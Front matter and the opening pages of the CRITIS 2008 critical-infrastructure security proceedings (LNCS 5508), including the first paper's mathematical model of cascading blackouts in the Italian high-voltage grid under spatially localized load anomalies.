Lecture Notes in Computer Science Commenced Publication in 1973 Founding and Former Series Editors: Gerhard Goos, Juris Hartmanis, and Jan van Leeuwen
Editorial Board David Hutchison Lancaster University, UK Takeo Kanade Carnegie Mellon University, Pittsburgh, PA, USA Josef Kittler University of Surrey, Guildford, UK Jon M. Kleinberg Cornell University, Ithaca, NY, USA Alfred Kobsa University of California, Irvine, CA, USA Friedemann Mattern ETH Zurich, Switzerland John C. Mitchell Stanford University, CA, USA Moni Naor Weizmann Institute of Science, Rehovot, Israel Oscar Nierstrasz University of Bern, Switzerland C. Pandu Rangan Indian Institute of Technology, Madras, India Bernhard Steffen University of Dortmund, Germany Madhu Sudan Microsoft Research, Cambridge, MA, USA Demetri Terzopoulos University of California, Los Angeles, CA, USA Doug Tygar University of California, Berkeley, CA, USA Gerhard Weikum Max-Planck Institute of Computer Science, Saarbruecken, Germany
5508
Roberto Setola Stefan Geretshuber (Eds.)
Critical Information Infrastructures Security Third International Workshop, CRITIS 2008 Rome, Italy, October 13-15, 2008 Revised Papers
13
Volume Editors Roberto Setola Complex System and Security Lab - University CAMPUS Bio-Medico of Rome Via A. del Portillo, 21, 00128 Rome, Italy E-mail:
[email protected] Stefan Geretshuber IABG mbH Germany, InfoCom, Safety and Security, Dept. for Critical Infrastructures Einsteinstr. 20, 85521 Ottobrunn, Germany E-mail:
[email protected] Library of Congress Control Number: 2009934295 CR Subject Classification (1998): C.2, D.4.6, J.2, B.4.5, K.4.1, K.4.4 LNCS Sublibrary: SL 4 – Security and Cryptology ISSN ISBN-10 ISBN-13
0302-9743 3-642-03551-5 Springer Berlin Heidelberg New York 978-3-642-03551-7 Springer Berlin Heidelberg New York
This work is subject to copyright. All rights are reserved, whether the whole or part of the material is concerned, specifically the rights of translation, reprinting, re-use of illustrations, recitation, broadcasting, reproduction on microfilms or in any other way, and storage in data banks. Duplication of this publication or parts thereof is permitted only under the provisions of the German Copyright Law of September 9, 1965, in its current version, and permission for use must always be obtained from Springer. Violations are liable to prosecution under the German Copyright Law. springer.com © Springer-Verlag Berlin Heidelberg 2009 Printed in Germany Typesetting: Camera-ready by author, data conversion by Scientific Publishing Services, Chennai, India Printed on acid-free paper SPIN: 12726011 06/3180 543210
Preface
This volume contains the proceedings of the Third International Workshop on Critical Information Infrastructure Security (CRITIS 2008), which was held October 13–15, 2008 in Villa Mondragone (Rome), Italy, and was co-organized by AIIC (The Italian Society of Critical Infrastructures Experts) and ENEA (The Italian National Agency for New Technology, Energy and the Environment). This year’s workshop was focused on an interdisciplinary and multifaced dialogue about the third millennium security strategies for critical information infrastructures (CII) and their protection (CIP). The aim was to explore the new challenges posed by the CII, bringing together researchers and professionals from universities, private companies and public administrations interested in all security-related aspects, and actively involved in the scientific communities at a national, European and trans-European level. More than 70 papers were submitted to the conference, which were screened by a very selective double-blind review process to identify the 39 papers selected for presentation, based on their significance, novelty and technical quality. Revisions were not checked and the authors bear full responsibility for the content of their papers. CRITIS 2008 also had six outstanding invited speakers: Erol Gelenbe (Imperial College, UK), Massoud Amin (University of Minnesota, USA), George Apostolakis (MIT, USA), Andrea Valboni (Microsoft, Italy), Sujeet Shenoi (University of Tulsa, USA) and Angelo Marino (DG Information Society and Media, European Commission). All the contributions highlight the current development in the field of critical (information) infrastructures and their protection. Specifically they emphasized that the efforts dedicated to this topic are beginning to provide some concrete results. Indeed the main focus has moved from the problem definition toward its formalization, qualification and solution. Some papers illustrated interesting and innovative approaches devoted to understanding, analyzing and modeling a scenario composed of several heterogeneous and interdependent infrastructures. Interesting results were related to vulnerability and risk assessment of the different components of critical infrastructures and more specifically to those of the cyber layer. Furthermore, issues concerning crisis management scenarios for interdependent infrastructures were illustrated. Encouraging preliminarily results were presented about the development of new technological solutions addressing self-healing capabilities of infrastructures, regarded as one of the most promising research topics to improve the resilience of infrastructures. The relevance assumed by CRITIS conferences was confirmed by the support given by the IEEE and IFIP communities active in CIP, by the patronage offered by the Italian Prime Minister Office and the JRC of the European Commission, as well as by sponsorship provided by Telecom Italia, Microsoft, Theorematica,
VI
Preface
Siemems, IABG, D’Appolonia, and IAS Fraunhofer, to whom we are greatly indebted. Many people have contributed to the successful organization of the conference and we are really very much obliged to all of them. Among others we need to thank the General Co-chairs Sandro Bologna and Stefanos Gritzalis and the Conference Honorary Chair, Salvatore Tucci. We sincerely thank them for their excellent support, encouragement and for their help in all organizational issues. Our special thanks also go to Emiliano Casalicchio for managing all the organizational and logistical issues as Local Organization Chair, Stefano Panzieri for the preparation and maintenance of the workshop website and all other people who worked together organizing the conference. CRITIS 2008 thanks the members of the Program Committee and the external reviewers who performed an excellent job during the review process, which is the essence of the quality of the event, and last but not least the authors who submitted papers as well as the participants from all over the world who chose to honor us with their attendance. April 2009
Roberto Setola Stefan Geretshuber
CRITIS 2008 Third International Workshop on Critical Information Infrastructure Security Villa Mondragone Monte Porzio Catone, Rome October 13–15, 2008 Organized by AIIC – Associazione Italiana Infrastrutture Critiche ENEA – Ente per le Nuove tecnologie, l’Energia e l’Ambiente
Program Co-chairs Roberto Setola Stefan Geretshuber
Università CAMPUS Bio-Medico, Italy IABG, Germany
General Co-chairs Sandro Bologna Stefanos Gritzalis
ENEA, Italy University of the Aegean, Greece
Honorary Chair Salvatore Tucci
Italian Prime Minister Office, Università Roma Tor Vergata, AIIC, Italy
Sponsorship Co-chairs Salvatore D’Antonio Marcelo Masera Stefano Panzieri
CINI, Italy IPSC, Joint Research Centre, Italy Università di Roma Tre, Italy
Local Organization Chair Emiliano Casalicchio
Università di Roma Tor Vergata, Italy
VIII
Organization
International Program Committee George Apostolakis Fabrizio Baiardi Robin Bloomfield Stefan Brem Donald D. Dudenhoeffer Myriam Dunn Claudia Eckert Urs E. Gattiker Erol Gelenbe Adrian Gheorghe Eric Goetz Nouredine Hadjsaid Bernhard M. Hämmerli Chris Johnson Raija Koivisto Rüdiger Klein Javier Lopez Eric Luiijf Angelo Marino Simin Nadjm-Tehrani Eiji Okamoto Andrew Powell Kai Rannenberg Michel Riguidel Erich Rome William H. Sanders Sujeet Shenoi Neeraj Suri Giovanni Ulivi Paulo Veríssimo Stephen D. Wolthusen Stefan Wrobel Jianying Zhou
MIT, USA Università di Pisa, Italy City University, UK Federal Office for Civil Protection, Switzerland INL, USA ETH Center for Security Studies Zurich, Switzerland Fraunhofer SIT, Germany CyTRAP Labs, Switzerland Imperial College London ,UK Old Dominion University, USA Dartmouth College, USA L.E.G., Grenoble Institute of Technology, France Acris GmbH & Univ. Applied Sciences Lucerne, Switzerland Glasgow University, UK VTT, Finland Fraunhofer IAIS, Germany University of Malaga, Spain TNO -Defence, Security and Safety, The Netherlands European Commission Linköping University, Sweden and Univ. of Luxembourg University of Tsukuba, Japan CPNI, UK Goethe University Frankfurt, Germany ENST, France Fraunhofer IAIS, Germany University of Illinois, US University of Tulsa, USA TU Darmstadt, Germany DIA – Università di Roma Tre, Italy Universidade de Lisboa, Portugal Royal Holloway, University of London, UK University of Bonn and Fraunhofer IAIS, Germany Institute for Infocom Research, Singapore
Organizing Committee Susanna Del Bufalo Stefano De Porcellinis Annamaria Fagioli
ENEA, Italy Università CAMPUS Bio-Medico, Italy ENEA, Italy
Organization
Emanuele Galli Bernardo Palazzi Federica Pascucci Elena Spadini
Università di Roma Tor Vergata, Italy Università di Roma Tre, Italy Università di Roma Tre, Italy Università CAMPUS Bio-Medico, Italy
Steering Committee Chairs Bernhard M. Hämmerli Javier Lopez
Acris GmbH and University of Applied Sciences Lucerne, Switzerland University of Malaga, Spain
Members Sokratis Katsikas Reinhard Posch Saifur Rahman
External Reviewers Salvatore D'Antonio Vincenzo Fioriti Andrea Rigoni Reinhard Hutter Sandro Meloni Marco Carbonelli-Laura Laura Gratta Roberto Obialero Giovanni Pellerino Ugo Marturano Ilaria Scarano Claudio Calisti
University of the Aegean, Greece Technical University Graz, Austria Advanced Research Institute, Virginia Tech, USA
IX
Table of Contents
Blackouts in Power Transmission Networks Due to Spatially Localized Load Anomalies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Carla Dionisi, Francesca Mariani, Maria Cristina Recchioni, and Francesco Zirilli Stability of a Distributed Generation Network Using the Kuramoto Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Vincenzo Fioriti, Silvia Ruzzante, Elisa Castorini, Elena Marchei, and Vittorio Rosato Enabling System of Systems Analysis of Critical Infrastructure Behaviors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . William J. Tolone, E. Wray Johnson, Seok-Won Lee, Wei-Ning Xiang, Lydia Marsh, Cody Yeager, and Josh Blackwell Information Modelling and Simulation in Large Interdependent Critical Infrastructures in IRRIIS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . R¨ udiger Klein, Erich Rome, C´esaire Beyel, Ralf Linnemann, Wolf Reinhardt, and Andrij Usov Multi-level Dependability Modeling of Interdependencies between the Electricity and Information Infrastructures . . . . . . . . . . . . . . . . . . . . . . . . . . Marco Beccuti, Giuliana Franceschinis, Mohamed Kaˆ aniche, and Karama Kanoun Interdependency Analysis in Electric Power Systems . . . . . . . . . . . . . . . . . . Silvano Chiaradonna, Felicita Di Giandomenico, and Paolo Lollini Modeling and Simulation of Complex Interdependent Systems: A Federated Agent-Based Approach . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Emiliano Casalicchio, Emanuele Galli, and Salvatore Tucci Self-healing and Resilient Critical Infrastructures . . . . . . . . . . . . . . . . . . . . . Rune Gustavsson and Bj¨ orn St˚ ahl Critical Infrastructures Security Modeling, Enforcement and Runtime Checking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Anas Abou El Kalam and Yves Deswarte INcreasing Security and Protection through Infrastructure REsilience: The INSPIRE Project . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Salvatore D’Antonio, Luigi Romano, Abdelmajid Khelil, and Neeraj Suri
1
14
24
36
48
60
72 84
95
109
XII
Table of Contents
Increase of Power System Survivability with the Decision Support Tool CRIPS Based on Network Planning and Simulation Program R PSSSINCAL .................................................. Christine Schwaegerl, Olaf Seifert, Robert Buschmann, Hermann Dellwing, Stefan Geretshuber, and Claus Leick Information Modelling and Simulation in Large Dependent Critical Infrastructures – An Overview on the European Integrated Project IRRIIS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . R¨ udiger Klein
119
131
Assessment of Structural Vulnerability for Power Grids by Network Performance Based on Complex Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . Ettore Bompard, Marcelo Masera, Roberto Napoli, and Fei Xue
144
Using Centrality Measures to Rank the Importance of the Components of a Complex Network Infrastructure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Francesco Cadini, Enrico Zio, and Cristina-Andreea Petrescu
155
RadialNet: An Interactive Network Topology Visualization Tool with Visual Auditing Support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Jo˜ ao P.S. Medeiros and Selan R. dos Santos
168
Quantitative Security Risk Assessment and Management for Railway Transportation Infrastructures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Francesco Flammini, Andrea Gaglione, Nicola Mazzocca, and Concetta Pragliola Assessing and Improving SCADA Security in the Dutch Drinking Water Sector . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Eric Luiijf, Manou Ali, and Annemarie Zielstra
180
190
Analysis of Malicious Traffic in Modbus/TCP Communications . . . . . . . . Tiago H. Kobayashi, Aguinaldo B. Batista Jr., Jo˜ ao Paulo S. Medeiros, Jos´e Macedo F. Filho, Agostinho M. Brito Jr., and Paulo S. Motta Pires
200
Scada Malware, a Proof of Concept . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Andrea Carcano, Igor Nai Fovino, Marcelo Masera, and Alberto Trombetta
211
Testbeds for Assessing Critical Scenarios in Power Control Systems . . . . Giovanna Dondossola, Geert Deconinck, Fabrizio Garrone, and Hakem Beitollahi
223
A Structured Approach to Incident Response Management in the Oil and Gas Industry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Maria B. Line, Eirik Albrechtsen, Martin Gilje Jaatun, Inger Anne Tøndel, Stig Ole Johnsen, Odd Helge Longva, and Irene Wærø
235
Table of Contents
XIII
Security Strategy Analysis for Critical Information Infrastructures . . . . . Jose Manuel Torres, Finn Olav Sveen, and Jose Maria Sarriegi
247
Emerging Information Infrastructures: Cooperation in Disasters . . . . . . . . Mikael Asplund, Simin Nadjm-Tehrani, and Johan Sigholm
258
Service Modeling Language Applied to Critical Infrastructure . . . . . . . . . . Gianmarco Baldini and Igor Nai Fovino
271
Graded Security Expert System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . J¨ uri Kivimaa, Andres Ojamaa, and Enn Tyugu
279
Protection of Mobile Agents Execution Using a Modified Self-Validating Branch-Based Software Watermarking with External Sentinel . . . . . . . . . . Joan Tom` as-Buliart, Marcel Fern´ andez, and Miguel Soriano Adaptation of Modelling Paradigms to the CIs Interdependencies Problem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Jose M. Sarriegi, Finn Olav Sveen, Jose M. Torres, and Jose J. Gonzalez Empirical Findings on Critical Infrastructure Dependencies in Europe . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Eric Luiijf, Albert Nieuwenhuijs, Marieke Klaver, Michel van Eeten, and Edite Cruz Dependent Automata for the Modelling of Dependencies . . . . . . . . . . . . . . Susanna Donatelli Application of IPK (Information, Preferences, Knowledge) Paradigm for the Modelling of Precautionary Principle Based Decision-Making . . . . Adam Maria Gadomski and Tomasz Adam Zimny
287
295
302
311
319
Disaster Propagation in Heterogeneous Media via Markovian Agents . . . Davide Cerotti, Marco Gribaudo, and Andrea Bobbio
328
A Study on Multiformalism Modeling of Critical Infrastructures . . . . . . . Francesco Flammini, Valeria Vittorini, Nicola Mazzocca, and Concetta Pragliola
336
Simulation of Critical ICT Infrastructure for Municipal Crisis Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Adam Kozakiewicz, Anna Felkner, and Tomasz Jordan Kruk An Ontology-Based Approach to Blind Spot Revelation in Critical Infrastructure Protection Planning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Joshua Blackwell, William J. Tolone, Seok-Won Lee, Wei-Ning Xiang, and Lydia Marsh
344
352
XIV
Table of Contents
Security of Water Infrastructure Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . Demetrios G. Eliades and Marios M. Polycarpou Critical Infrastructures as Complex Systems: A Multi-level Protection Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Pierluigi Assogna, Glauco Bertocchi, Antonio DiCarlo, Franco Milicchio, Alberto Paoluzzi, Giorgio Scorzelli, Michele Vicentino, and Roberto Zollo Challenges Concerning the Energy-Dependency of the Telecom Infrastructure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Lothar Fickert, Helmut Malleck, and Christian Wakolbinger An Effective Approach for Cascading Effects Prevision in Critical Infrastructures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Luisa Franchina, Marco Carbonelli, Laura Gratta, Claudio Petricca, and Daniele Perucchini Author Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
360
368
376
386
395
Blackouts in Power Transmission Networks Due to Spatially Localized Load Anomalies Carla Dionisi1 , Francesca Mariani1 , Maria Cristina Recchioni2 , and Francesco Zirilli1 1 CERI - Centro di Ricerca “Previsione, Prevenzione e Controllo dei Rischi Geologici”, Universit` a di Roma “La Sapienza”, Piazza Umberto Pilozzi 9, 00038 Valmontone (Roma), Italy
[email protected], fra−
[email protected],
[email protected] 2 Dipartimento di Scienze Sociali “D. Serrani”, Universit` a Politecnica delle Marche, Piazza Martelli 8, 60121 Ancona, Italy
[email protected] Abstract. In this paper we study cascading blackouts in power transmission networks due to spatially localized load anomalies. The term “spatially localized load anomalies” means that the overloaded nodes in the graph representing the power transmission network are concentrated in a small zone of the graph. Typically these anomalies are caused by extreme weather conditions localized in some parts of the region served by the power transmission network. We generalize a mathematical formulation of the cascading blackout problem introduced in [1] and later developed in [2]. This mathematical formulation of the blackout problem when the load of the network is perturbed randomly allows the study of the probability density functions of the measure of the size of the blackout generated and of the occupation of the network lines. The analysis presented shows that spatially localized load anomalies of a given “magnitude” can generate blackouts of larger size than the blackouts generated by a load anomaly of the same magnitude distributed proportionally on the entire network. Load anomalies of this last type have been studied in [1], [2]. The previous results are obtained studying the behaviour of the Italian high voltage power transmission network through some numerical experiments. Keywords: power transmission network, cascading blackout, stochastic optimization, mathematical programming.
It is a pleasure to thank A. Farina and A. Graziano of SELEX-Sistemi Integrati s.p.a., Roma, Italy for helpful discussions and advice during the preparation of this paper. The work of Francesca Mariani has been partially supported by SELEX Sistemi Integrati s.p.a., Roma, Italy through a research contract granted to CERI-Universit` a di Roma “La Sapienza”. The numerical experience reported in this paper has been obtained using the computing grid of ENEA (Roma, Italy). The support and sponsorship of ENEA are gratefully acknowledged.
R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 1–13, 2009. c Springer-Verlag Berlin Heidelberg 2009
2
C. Dionisi et al.
1
Introduction
The problem of cascading failures is of great interest in the study of large complex transmission networks such as the electric power networks. The cascading failures are failures occurring in a fast time scale as effect of the reduction of the operating margins in the transmission network due to congestions or line breakdowns. The control of these cascading failures is a challenging problem since the transmission networks present high interdependence between their components. In the case of power transmission networks this interdependence is the main reason of their vulnerability, in fact, due to it local overloads of lines or local failures of components can generate cascades of current breaks that, in extreme cases, can cause the fall of the whole network. This phenomenon is called “cascading blackout”. The meaning of the term “blackout” is simply “temporary absence of electric power in some parts of an electric network”. The “cascading blackout” phenomenon in the recent scientific and technical literature has been studied using several approaches (see [2], [3] and the reference therein). The analysis presented in this paper is inspired by the approach that studies the blackout dynamics considering the network behaviour in steady state conditions when random fluctuations are introduced in the load of the network. In this approach the blackout dynamics is simulated as a sequence of stationary states. An analytical model of this type is the “CASCADE” model presented in [4] and further developed in [2]. In this model the status of the network is represented through the DC power flow problem. This type of model has been used to study the behaviour of a part of the USA power transmission network in [1] (the IEEE 118 bus network [5]) and of the Italian high voltage power transmission network in [2]. Furthermore since the blackouts generated are induced by random fluctuations of the loads of the network around prescribed mean load values using this type of models the statistical analysis of the blackout size measure associated to load anomalies is easily performed. Similarly the statistical analysis of the resulting line occupations is easily performed. This approach is of great practical value since it makes possible the numerical simulation of the behaviour of relevant networks at an affordable computational cost. Obviously, this simple approach provides a crude approximation of the blackout dynamics. In fact, it does not consider issues due to reactive voltages. More realistic models such as the AC model could be used (see for example [6]) and their use in blackout dynamic simulation deserves further investigation. The work presented here is based on the analysis proposed in [2] and when compared with [2] introduces two main novelties: the first one is a nonlinear merit function and the second one is a new way of increasing the load of the network that models a spatially localized load anomaly. In [2] the merit function is a linear function so that the optimal DC power flow problem reduces to a linear programming problem that can be solved with the simplex algorithm. Here we remove the restriction of the linearity of the merit function considering nonlinear merit functions. However, we retain the linearity of the constraints. In particular, we consider a quadratic merit function that tries to select the configuration that minimizes the cost of the power injected by the generator nodes present in the
Blackouts in Power Transmission Networks
3
network. Obviously, this change in the objective function induces a change in the numerical method used to solve the optimization problem that is now a problem with linear constraints and quadratic objective function. The use of the nonlinear merit function and of an interior point algorithm to solve the corresponding optimization problem changes substantially the resulting optimal flow. In general the flows determined with the model presented in this paper have smaller power generation cost than those determined with the models used in [1], [2]. In [2] starting from a feasible optimal DC power flow problem the power demand is increased increasing the expected value of the power demanded by all the load nodes proportionally. This is the case to consider when we want to study the network response to the behaviour over the years of the power demand. In this paper we study the blackout dynamics when the power demand increment is concentrated in a group of load nodes that are localized in space. This is the case to consider when exceptional events, such as, extreme weather conditions, hit some zone of the network. Finally, to simulate a cascading blackout we consider values of the total power demand corresponding to unfeasible optimal DC power flow problems. An optimal DC power flow problem is unfeasible when the constraints are inconsistent. An unfeasible problem is unsolvable. However in general, depending on the objective function, a constrained optimization problem can be unsolvable even if the constraints are not inconsistent. We note that the choice of the objective function made later, see (9), implies that when the DC power flow problem is unsolvable the constraints are inconsistent. We reduce the simulation of the dynamics of cascading blackouts to the study of a sequence of optimal DC power flow problems. In fact, once established that the optimal DC power flow problem is unfeasible, following some specified rules, we simulate the blackout cascade (see Steps 1-10 in Section 2). As done in [2] we measure the size of the blackout generated as being the fraction of the total power load that has been shed during the cascading blackout simulation. If all the loads are shed the measure of the corresponding blackout size is equal to one and this means that the whole power transmission network is blackout. Under some specified assumptions we study the probability density function of the measure of the size of the blackout generated with the previous scheme and in particular we consider the probability of generating large blackouts. We consider probability density functions of the blackout size measure for several given values of the (mean) total power demand. We say that the transmission network is in critical condition whenever these probability density functions show a tail decreasing as a power law when the blackout size measure increases. We limit our analysis to the study of the blackout size measure probability density function as a function of the power demand in the case of the Italian high voltage power transmission network (Figure 1) when the power demand increment is concentrated in a group of load nodes that are localized in space (black box in Figure 1). As a function of the power demand we investigate when this probability density function changes from being best fitted by a negative exponential function to being best fitted by an inverse power law. This phenomenon
4
C. Dionisi et al.
Fig. 1. A graph representing an high voltage power transmission network and the box containing the overloaded load nodes
describes the transition of the network from noncritical to critical condition and is reminiscent of the phase transition phenomenon in statistical mechanics. The group of load nodes localized in space where the power demand increment is concentrated is such that a significant fraction (about 30%) of the total power demand is contained in it and is made of nodes highly interconnected between themselves and with the remaining part of the network. The blackout resulting from anomalies in the condition of a group of load nodes localized in space depends on the fraction of the total power demand subject to the anomalies and on the connectivity of the network in the region where the anomalies are concentrated and outside this region. The results presented in this paper with the load anomalies concentrated in the region shown in Figure 1 must be regarded as an example of the “generic” behaviour of the network. This analysis shows that the overload of a group of nodes localized in space generates critical situations for the network for a mean total power demand smaller than the mean total power demand necessary to generate critical situations when the overload is distributed proportionally over all the load nodes. Moreover, for the localized overload considered in this paper we see that the probability density function of the blackout size measure when the power demand increases has some large flat regions (Figure 2). Finally, we study the line occupations of the Italian high voltage power transmission network analyzing the mean values of the occupation of the lines when the loads fluctuate randomly as said above. The occupation of a line is the fraction of its capacity that is occupied by the power flowing on it. Our analysis shows that due to the presence of the quadratic merit function the lines in correspondence of generator nodes producing low cost power and/or contained in the region where the load anomaly is concentrated are heavily occupied. The numerical work needed to perform the study of the Italian high voltage power transmission network described above has been carried out using a Fortran code that runs on the ENEA computing grid. The ENEA grid is an infrastructure for multiplatform, parallel and distributed computing made of approximately
Blackouts in Power Transmission Networks
5
4000 processors located in 6 research centers around Italy [7]. The computation that has been done is very well suited for distributed computing and exploits deeply the power of the computing grid. In Section 2 we recall the mathematical model used to study the power transmission network and the cascading blackout dynamics, we define the line occupation and we explain how the load anomalies are generated. In Section 3 we use the model introduced in Section 2 to study the probability density function of the blackout size measure and the corresponding mean value of the occupations of the lines of the Italian high voltage power transmission network when a specified group of nodes is overloaded.
2
The Optimal DC Power Flow Model and the Simulation of the Blackout Dynamics
Let us define the optimal DC power flow problem studied (see [1] and [2] for further details). We begin describing the undirected graph representing the transmission network (Figure 1). The graph is made of nodes and branches. The nodes of the graph are divided into generator nodes (triangles), load nodes (circles), and junction nodes (diamonds). The branches of the graph are the network transmission lines where the electric power flows. We associate to each line (branch) its characteristic admittance. When in a real power transmission network multiple lines connect two nodes we substitute these lines with a unique line with admittance equal to the sum of the admittances of the multiple lines. We denote with k = 1, 2, ..., N, the N nodes of the graph representing the power transmission network (N ≥ 1), and for k, m = 1, 2, . . . , N we denote with with (k, m) the branch connecting the nodes k and m, and with yk,m , gk,m , bk,m , respectively the values of the admittance, of the conductance and of the susceptance of the line (k, m). We remind that yk,m = gk,m + ιbk,m , k, m = 1, 2, ..., N , where ι denotes the imaginary unit. When two nodes k, m are not connected by a line we associate to the branch (k, m) zero admittance, this implies that the power flowing in the branch will be zero. Let | · | be the absolute value of the complex number ·, we denote with Sk the total complex power injection at node k, with Pk and Qk its real (active power) and imaginary (reactive power) parts (i.e.: Sk = Pk + ιQk ), k = 1, 2, ..., N and with S = (S1 , S2 , ..., SN ) the power vector. We note that Pk and Qk are measured in MW (Megawatt) and that they can be expressed as differences of L G nonnegative quantities, that is Pk = PkG − PkL and Qk = QG k − Qk , where Pk , L Pk denote, respectively, the real power generated and the real power demanded L by the node k and QG k , Qk denote, respectively, the reactive power generated and the reactive power demanded by the node k, k = 1, 2, . . . , N . Moreover, for k = 1, 2, ..., N let SkG = PkG + ιQG k be the total complex power injection at node k and SkL = PkL + ιQL be the total power load withdrawn at node k. k Moreover, for k = 1, 2, . . . , N if the node k is a load or a junction node we have |SkG | = 0; on the other hand a generator node k may have nonzero complex power load SkL . In fact, this nonzero power demanded by the generator node
6
C. Dionisi et al.
may be needed to guarantee the functioning of the generator node. With Fk,m we denote the power flowing through the line (k, m), k, m = 1, 2, ..., N. The quantity Fk,m , k, m = 1, 2, ..., N, is a complex quantity measured in kVA (kilo Volt Amp`ere). For k = 1, 2, . . . , N let Vk = |Vk |(cos θk + ι sin θk ) be the complex voltage at node k, with absolute value |Vk | measured in kV (kilo Volt) and phase θk measured in radians. We remind that in [2] we have chosen the voltage vector |V | = (|V1 |, |V2 |, ..., |VN |) = (1, 1, ..., 1). We keep this choice here. Under suitable assumptions (see [2] and the reference therein for further details) a linearization of the balance power law holds, that is we have: Pk = PkG − PkL =
N
−bk,m δk,m ,
k = 1, 2, ..., N,
(1)
m=1,m=k
Qk = 0,
k = 1, 2, ..., N,
(2)
where δk,m = θk − θm , k, m = 1, 2, . . . , N . In this formulation the base power S0 and the base voltage V0 are chosen equal to 1 so that the equations (1) are dimensionless p.u. (proper unit) equations (see [2] and the reference therein). Let us state the DC (Direct Current) power flow problem: Given the load power demand vector P L = (P1L , P2L , ..., PNL ), the voltage magnitude vector |V | = (|V1 |, |V2 |, . . . , |VN |)=(1, 1, . . . , 1), the upper real power G limit of the nodes vector P G = (P1G , P2G , ..., PN ), the upper power flow limit Fk,m of the power flowing along the line (k, m), and the values of the susceptance bk,m of the line (k, m), k, m = 1, 2, ..., N , find the generator real power vector P G = (P1G , P2G , ..., PNG ), and the voltage angle vector θ = (θ1 , θ2 , ..., θN ) satisfying (1). Note that in general given P L , P G , Fk,m and bk,m , k, m = 1, 2, ..., N, the DC power flow equations (1) have several solutions so that it is a natural idea to introduce a merit function that will be minimized to choose one among these solutions. That is the following optimization problem is formulated: min Φ(P1G , P2G , ..., PNG ),
(3)
subject to: PkG − PkL =
N
Fk,m ,
k = 1, 2, ..., N,
(4)
m=1,m=k
Fk,m = −bk,m (θk − θm ),
k, m = 1, 2, ..., N,
(5)
|Fk,m | ≤ Fk,m , k, m = 1, 2, ..., N, 0 ≤ PkG ≤ PkG , k = 1, 2, ..., N,
(6) (7)
θ1 = 0,
(8)
where the merit function Φ is given by: Φ(P1G , P2G , ..., PNG ) =
N k=1
ck (PkG )2 − W
N
(PkL )2 ,
k=1
(9)
Blackouts in Power Transmission Networks
7
where W is a real positive constant representing a cost associated to the load nodes that we choose equal to 100 (as suggested in [4]) and ck is a positive constant associated to the cost of generating power in the node k, k = 1, 2, . . . , N . Remind that in the present formulation of the problem the quantities PkL , k = 1, 2, . . . , N , are given. Equation (8) is a normalization condition. Finally, we N L G denote with PD = N k=1 Pk the total power demand and with PC = k=1 Pk the total power capacity of the network. We consider the blackout dynamics generated by load anomalies concentrated in a group of nodes that are spatially localized in a zone of the graph when the values of the remaining parameters are unchanged. We study this effect as a function of the total power demand PD looking at increasing values of the total power demand PD . Let us define the blackout size measure. Let A˜ be the subset of {1, 2, ..., N } that contains the indices corresponding loads shed as a consequence of to the L the blackout cascade and let PS = P , ˜ k∈A k that is PS is the disconnected power load. We define the blackout size measure as the ratio PS /PD and we have: 0 ≤ PS /PD ≤ 1. The maximum blackout size measure is PS /PD = 1 that corresponds to a total blackout, that is when we have PS /PD = 1 all the loads are shed. Finally, for k, m = 1, 2, ..., N, when Fk,m > 0 we define occupation of F the line (k, m) the value Ok,m = Fk,m , when Fk,m = 0 the occupation of the k,m
line (k, m) is not considered, in fact in this case the branch (k, m) of the graph does not represent a real transmission line of the network (there is no power flowing on the branch (k, m)). The numerical scheme used to study the blackout phenomenon is a very simple scheme that tries to reproduce a sequence of events able to generate a blackout. The fact that the DC optimal power flow model describes a stationary situation (independent of time) and the time dependent character of the blackout phenomenon force us to consider a sequence of DC optimal power flow problems. This sequence of problems is built with the numerical scheme that follows. This scheme is only one choice between many other schemes implementing the same ideas in a different way. The quantitative results on the blackout phenomenon obtained depend on the scheme adopted but the broad picture of the phase transition phenomenon is substantially independent from the scheme adopted. The numerical scheme used to simulate the blackout cascade when some prespecified loads are overloaded is described in the following steps: Step 1: initialize the load power demand vector P 0,L = (P10,L , P20,L , ..., PN0,L ) with P L , the voltage magnitude vector |V |, the upper real power limit vector P G , the upper power flow limit values Fk,m , and the susceptance values bk,m , k, m = 1, 2, ..., N, with the given data; assign the set JL containing the indices of the load nodes where the mean load increment is concentrated, the parameter α ≥ 0 that will be used to increment the loads and the number NE of simulations to be performed; set n = 0; Step 2: for k = 1, 2, . . . , N , set PkL ← Pk0,L , k ∈ / JL , PkL ← Pk0,L (1 + α), k ∈ JL N and PD = k=1 PkL ;
8
